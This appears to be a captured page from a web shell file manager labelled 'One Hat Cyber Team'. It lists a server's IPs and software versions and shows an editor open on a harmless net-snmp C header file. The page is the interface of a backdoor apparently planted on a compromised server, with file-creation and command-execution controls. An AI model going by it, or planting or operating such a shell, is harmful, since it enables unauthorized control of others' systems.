One Hat Cyber Team
Your IP :
162.159.115.34
Server IP :
188.114.96.3
Server :
Linux thuru 6.5.11-4-pve #1 SMP PREEMPT_DYNAMIC PMX 6.5.11-4 (2023-11-20T10:19Z) x86_64
Server Software :
Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips
PHP Version :
7.3.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
include
/
net-snmp
/
agent
/
Edit File:
snmp_get_statistic.h
#ifndef SNMP_GET_STATISTIC_H #define SNMP_GET_STATISTIC_H /** Registers a scalar group with statistics from @ref snmp_get_statistic. * as reginfo.[start, start + end - begin]. * @param reginfo registration to register the items under * @param start offset to the begin item * @param begin first snmp_get_statistic key to return * @param end last snmp_get_statistic key to return */ int netsnmp_register_statistic_handler(netsnmp_handler_registration *reginfo, oid start, int begin, int end); #define NETSNMP_REGISTER_STATISTIC_HANDLER(reginfo, start, stat) \ netsnmp_register_statistic_handler(reginfo, start, \ STAT_ ## stat ## _STATS_START, \ STAT_ ## stat ## _STATS_END) #endif
Simpan